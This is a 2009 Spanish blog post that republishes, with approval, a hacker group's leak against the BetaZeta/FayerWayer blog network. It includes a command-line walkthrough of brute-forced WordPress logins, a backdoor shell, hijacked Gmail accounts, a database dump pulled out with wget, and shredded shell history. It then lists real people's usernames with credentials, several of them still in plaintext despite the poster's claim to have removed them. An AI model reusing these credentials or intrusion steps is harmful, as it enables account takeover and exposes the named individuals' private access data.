Noche de hackers... FayerWayer Owned (F4Y3RW4Y3R PWN3D)

sábado, julio 11, 2009

Esta madrugada, cerca de la media noche, mientras leía la imagen que había publicado Anti-sec en los servidores de Imageshack me dispuse a revisar el RSS de FayerWayer a ver si encontraba alguna noticia interesante y mi sorpresa es que me consigo con la siguiente noticia: "F4Y3RW4Y3R PWN3D" y cuando la abro nada más y nada menos que esto (no tiene desperdicio):

|||||||||||||||||||||||||||||||||||||||||||||||||||||
[================== 1ns3c gr0up ====================]
[------- t1nky_w1nky - d1psy - l44_l44 - p0 -------]
___________ .___.____ __
\_ _____/ _ \ | | | ________ _____/ |______
| __)/ /_\ \| | | \___ // __ \ __\__ \
| \/ | \ | |___ / /\ ___/| | / __ \_
\___ /\____|__ /___|_______ \/_____ \\___ >__| (____ /
\/ \/ \/ \/ \/ \/

[======================| 0wn3d |=====================]
||||||||||||||||||||||||||||||||||||||||||||||||||||||

/*
* BetaFail (aka BetaZeta aka LoserZeta aka BetaWeeta -- thnx chilean dudes ^^)
* is a loser-blogger-network which claims to be experts on technology... so lets see!
*/


]====== 0x00 ======[ Index

[=-0x01-=] Affected domains
[=-0x02-=] Vulnerabilities
[=-0x03-=] Intrussion
[=-0x04-=] Data requesting
[=-0x05-=] Exposure
[=-0x06-=] Extras

-------------------------------------------------------------------------------

]====== 0x01 =======[ Affected Domains
+ The affected domains are:
|- http://www.betazeta.com
|- http://www.fayerwayer.com
|- http://www.theclinic.cl
|- http://www.saborizante.cl
|- http://leo.prieto.cl
|- http://www.betaid.org
|- http://www.wayerless.com
|- http://www.niubie.com
|- http://www.botonturbo.com
|- http://www.tecnosquad.com
|- http://www.chw.net
|- http://www.zetacorp.net
|- http://www.zimio.com
|- http://www.i2b.cl
|_/
-
-------------------------------------------------------------------------------
]====== 0x02 ======[ Vulnerabilities
/*
* So you can ask yourself, how can this be? Easy: if you set a weak
* password you have a weak security, if you store all your accounts in your mail
* you hace a weak security.
* -> JF aka JF10 aka Juan Francisco Diez has a 9 int long password, easy enought to
* been brute forced.
* -> Leo aka Leo Prieto has a 5 char + 3 int password (dictionary password).
* And so on... these dudes really don't know shit about security and lucky for us
* theirs servers were totally open for us (open legs?).
*/

-------------------------------------------------------------------------------
]====== 0x03 ======[ Intrussion
/* Hey ho, lets GO! */


(=| proof-of-concept |=)
/* First get get the silliest password ever from our very best friend JF on any of
* the services he uses: twitter, wordpress, etc.. (yes... really silly but he uses
* the same password for everything!):
*/

[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user=jf10 http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
................................................................................
................................................................................
....................... FOUND! (2020229)
[1nf3ct3d@darkside:~]$ cat bruteforce-wordlist |bf -user='leo prieto' http://www.fayerwayer.com/wp-login.php
|===== expl0iting www.fayerwayer.com ====|
................................................................................
................................................................................
................................................................................
.................................................. FOUND! (macoy123)
[1nf3ct3d@darkside:~]$

/* Done. Now, search a prompt: */

[1nf3ct3d@darkside:~]$ telnet fayerwayer.com 37337
Trying 174.132.120.218...
Connected to fayerwayer.com.
Escape character is '^]'.
bash$

/* Now we can try with anything... say... gmail: */

[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user jf10 -pass 2020229 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password ... OK
New password is: HuJucF53

/* Heh! Now lets play with Leo Prieto's stuff (again... same password almost
* for everything) */

[1nf3ct3d@darkside:~]$ ./gmail-delete.py -user leo -pass macoy123 http://mail.google.com/a/betazeta.com
Logged in.
Deleting
[================================================================================================] 100%
Changing user password ... OK
New password is: 4Gh4Fhb
[1nf3ct3d@darkside:~]$


-------------------------------------------------------------------------------
]====== 0x04 ======[ Data requesting
/* Wordpress has been infected ... now waiting for our data */

[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/12/sheet.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ tail sheet.jpg
user: pass:
user: pass:
user: mr_self-destruct pass: ********
user: march3lo pass: marcel
user: mr_self-destruct pass: ********
user: mr_self-destruct pass: ********
user: sir_lestat pass: ********
user: asdsadfsadf pass: ********
user: Chok pass: ********
user: successor pass: ********
/* Amazing .... */
[1nf3ct3d@darkside:~]$ wc -l sheet.jpg
682 sheet.jpg
[1nf3ct3d@darkside:~]$ wget http://www.botonturbo.com/wp-content/uploads/2007/11/sheet.jpg -o /dev/null -O sheet2.jpg
[1nf3ct3d@darkside:~]$

/* Awesome! For each domain we repeat */


[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org
Password:
betaid@betaid.org:~$ ls
app_error.php app_model.php config controllers htaccess.template httpdocs index.php locale models plugins tests tmp vendors views webroot
betaid@betaid.org:~$ cd config
betaid@betaid.org:~/config$ ls
acl.ini.php betaid.php bootstrap.php chile.sql core.php database.php entelpcs.php inflections.php openid.php routes.php sql
betaid@betaid.org:~$ grep -v \* database.php
class DATABASE_CONFIG {

var $default = array(
'driver' => 'mysql',
'persistent' => false,
'host' => 'localhost',
'login' => 'betaman', /* look at this! */
'password' => '********',
'database' => 'betaid_main',
'encoding'=> 'UTF8',
'prefix' => '',
);

var $test = array(
'driver' => 'mysql',
'persistent' => false,
'host' => 'localhost',
'login' => 'user',
'password' => '********',
'database' => 'test_database_name',
'prefix' => '',
);
}
betaid@betaid.org:~$
/* OMFG! Is a DB_delete_all_my_content password? */

betaid@betaid.org:~$ mysqldump -ubetaman -pbetapass betaid_main >../httpdocs/betaz.sql
betaid@betaid.org:~$ exit
[1nf3ct3d@darkside:~]$ wget http://www.betaid.org/betaz.sql -o /dev/null
[1nf3ct3d@darkside:~]$ ssh betaid@betaid.org "rm -rf httpdocs/betaz.sql && shred .bash_history"
Password:
[1nf3ct3d@darkside:~]$

/* Its time to infect betaid to obtain all data!. We modify controller/auth_controller.php and pump it up */

[1nf3ct3d@darkside:~]$ wget http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -o /dev/null
[1nf3ct3d@darkside:~]$ wc -l audi-a3.jpg
262 audi-a3.jpg
[1nf3ct3d@darkside:~]$ tail -5 audi-a3.jpg
user: zector pass: ********
user: chokolat pass: ********
user: andru pass: ********
user: angrod pass: ********
user: elmono pass: ********
[1nf3ct3d@darkside:~]$ perl http-delete.pl http://www.wayerless.com/wp-content/uploads/2008/11/audi-a3.jpg -u admin
admin's pwd:
1 file(s) deleted.
[1nf3ct3d@darkside:~]$

-------------------------------------------------------------------------------
]====== 0x05 ======[ Exposure
/* All that you want to see! THE DATA! */
/* Anyone want to twit? */
twitter.com:fayerwayer:f4y3rw4y3rdoesthisshit4realz
vimeo.com:fw@fayerwayer.com:gatoinalambrico

ZeroZen:
mail.google.com/a/zetacorp.net:zerozen:rtr944a5
gmail.com:zeroblogger:rtr944a5
www.google.com/a/betazeta.com:zerozen:rtr944a4

Mail:Pass
jf@betazeta.com:********
leo@betazeta.com:********

http://wayerless.com
user:sebastian pass: ********
user:rodrigo pass: ********
user:juaqion pass: ********
user: rodrigo pass: ********
user: admin pass: ********
user: frajola pass: ********

FayerWayer:
user: rodrigo pass: ********
user: admin pass:********
user: frajola pass:********
user: JF10 pass:********
user: sebastian pass:********
user: carlos pass:********
user: Amenadiel pass:********
user: hugo pass:********
user: admin pass:********
user: i2b pass:********
user: diego pass:********
user: leo prieto pass:********
user: diego pass:********
user: Diego pass:********
user: diego pass:********
user: ZeroZen pass:********
user: carlos pass:********
user: Ultraviolet pass:********
user: FelipeLang pass:********
user: Ultraviolet pass:********
user: eft0 pass:********
user: eft0@zetacorp pass:********

DB user fayerwayer
DB pass MysqlFayerwayer80

user: mr.chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr.chips pass:********
user: mr.chips pass:********
user: mr.chips pass:********
user: mr.chips pass:********
user: mr.chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: mr. chips pass:********
user: Boxbyte pass:********
user: admin pass:********
user: leoprieto@gmail.com pass: ********

URL: http://69.89.21.73:2082/frontend/bluehost/index.html
user: itwobcl
pass: ********

FTP
IP: 69.89.21.73
User: itwobcl
Pass: ********
---
Jabber
User: esteban@hs.i2b.cl
Pass: ********

Mail
SMTP: smtp.i2b.cl
Port: 587
POP: pop.i2b.cl
Port: 110
User and account: esteban.fernandez@i2b.cl
Pass: ********
---
Customer #: 18766006
Simple Control Panel
URL: https://72.167.52.30:9999
User: zetacorp
Pass: ********

phpmyadmin
URL: http://72.167.52.30/phpMyAdmin
User: root
Pass: ********

SSH
IP: 72.167.52.30
User: zetacorp
Pass: ********

Admin WP
http://www.fayerwayer.com/wp-admin

User: admin
Pass: ********

Admin Limesurvey
http://www.fayerwayer.com/limesurvey/admin
User: admin
Pass: ********

MySQL
User: root
Pass: ********

Backup
IP: 208.109.188.17
User: zetacorp
Pass: ********

PIX
https://72.167.52.79/
User: zetacorp
Pass: ********

ftp FW
Host: fayerwayer.i2b.cl
User: fayerwayer
Pass: ********

i2b
URL: www.bluehost.com
User: i2b.cl
Pass: ********

FTP ablog.i2b.cl
Host: 69.89.21.73
User: itwobcl
Pass: ********
Root Blog: /public_html/blog/

http://www.betazeta.com/wp-admin/
User: admin
Pass: ********

zimio.com (SCP)
User: zimio
Pass: ********

betazeta.com
FTP
User: betazeta
Pass: ********

wayerless.com
FTP
User: wayerless
Pass: ********

zetacorp.net
FTP
User: zetacorp
Pass: ********


Plesk
URL: https://64.13.250.71:8443
Username:admin
Password:********

SSH
Host: saborizante.com
User: efernadez
Pass: ********

Root
Pass: ********

Sites
Path: /var/www/vhosts/dominio

User name: eft0
Password : ********
http://betazetanet.seework.com

http://devwayerles.i2b.cl
Username: admin
Password: ********

BetaID
user: lpinto pass: ********
user: perovi pass: ********
user: nestorcarrasco pass: ********
user: volkova pass: ********
user: melkorazo pass: ********
user: melkorazo pass: ********
user: patofuqs pass: ********
user: patofuqs pass: ********
user: patofuqs pass: ********
user: patofuqs pass: ********
user: gagoner pass: ********
user: claudiomix pass: ********
user: Vidal pass: ********
user: vidal pass: ********
user: lorena pass: ********
user: Polin pass: ********
user: derangedwolf pass: ********
user: darkoy pass: ********
user: darkjano pass: ********
user: hetnet pass: ********
user: hetnet pass: ********
user: nivyii pass: ********
user: nivyii pass: ********
user: serroba pass: ********
user: don juan pass: ********
user: donjuan pass: ********
user: grouchomarx pass: ********
user: grouchomarx pass: ********
user: Evadix pass: ********
user: doruku pass: ********
user: neuroshark pass: ********
user: neuroshark pass: ********
user: andyolivares pass: ********
user: andyolivares pass: ********
user: firexcool pass: ********
user: noquierouser pass: ********
user: Ecodrive pass: ********
user: ecodrive pass: ********
user: masteralfe pass: ********
user: Juako pass: ********
user: talkover pass: ********
user: davidqs pass: ********
user: Thefx pass: ********
user: thefx pass: ********
user: sprite pass: ********
user: nachx00 pass: ********
user: nachx00 pass: ********
user: pass: ********
user: vagrant pass: ********
user: forbidden pass: ********
user: payazo pass: ********
user: mescalier pass: ********
user: ruffox pass: ********
user: khalebd pass: ********
user: fako85 pass: ********
user: patus pass: ********
user: jorge pass: ********
user: dsalgado pass: ********
user: joseph pass: ********
user: joseph pass: ********
user: manuel pass: ********
user: suikakuyu pass: ********
user: suikakuyu pass: ********
user: eduardo pass: ********
user: paz pass: ********
user: paz pass: ********
user: dickinsonh2k pass: ********
user: clarkxp pass: ********
user: laura pass: ********
user: Marmota pass: ********
user: zirex pass: ********
user: chinito46 pass: ********
user: lukas pass: ********
user: lukas pass: ********
user: Esperpento pass: ********
user: rvs pass: ********
user: davdor pass: ********
user: kmepartaunrayo pass: ********
user: hiroki pass: ********
user: jf10 pass: ********
user: ail pass: ********
user: JanoMac pass: ********
user: eldarberserker pass: ********
user: Nanolethal pass: ********
user: necrox pass: ********
user: rkstro pass: ********
user: Elias pass: ********
user: antony pass: ********+
user: turbomaster pass: ********
user: turbomaster pass: ********
user: turbomaster pass: ********
user: Foxtrot pass: ********
user: vortex pass: ********
user: vortex pass: ********
user: francofa pass: ********
user: saint pass: ********
user: wurrzag pass: ********
user: wurrzag pass: ********
user: wurrzag pass: ********
user: wurrzag pass: ********
user: infositio pass: ********
user: camilo_dxmg@live pass: ********
user: zector pass: ********
user: chokolat pass: ********
user: andru pass: ********
user: angrod pass: ********
user: elmono pass: ********


-------------------------------------------------------------------------------
]====== 0x06 ======[ Extras
/* Do you remember when CHW was erradicated?
* Oh wait. Remember bootlog too? ;-)
* -- That's was the OPPORTUNITY which BetaZeta has to set a REAL security-policy
*
* Wanna download the betaid source code? Here:
*
* http://rapidshare.com/files/254417420/betaid.org.zip.html
* http://www.megaupload.com/?d=8FT5KYTP
*
*
* Direct message to JF: Be more humble, piece of shit.
* Seeya in the next issue!
*/



/* Dud3s! Y0u've been pwn3d by teletubbies! */

EOF


Los servidores afectados fueron todos los de BetaZeta (por eso el ataque se llamó FailZeta). Realmente les dieron duro. Los dejaron... DESNUDOS!

La gente de FayerWayer aún está llorando por Twitter y por otros sitios, pero creo que en lugar de llorar y decir que la seguridad de sus servidores no fue comprometida deberían aprender la lección:

No utilicen contraseñas de niños si tienen servicios conocidos o populares en internet, porque puede venir un teletubbie y ZAZZZZ en toda la boca, pa' que aprendan a ser serios ;)

Esta si que ha sido una noche realmente movida YAY! xD

Actualizado: Por petición de la gente de FayerWayer he quitado todas las contraseñas de los usuarios involucrados

4 comentarios:

Unknown dijo...

¿Estimado, es posible que borres las contraseñas?

Saludos,

JF

PKhayWEONEStanWEONES dijo...

otro weon más que publica las contraseñas....

.-.-.-.-.-.-. dijo...

Por ultimo subete los usernames afectados, pero no las passwords.

Unknown dijo...

A petición de los compañeros de FayerWayer (Juan Francisco Diez) he borrado todas las contraseñas de los usuarios afectados.

Saludos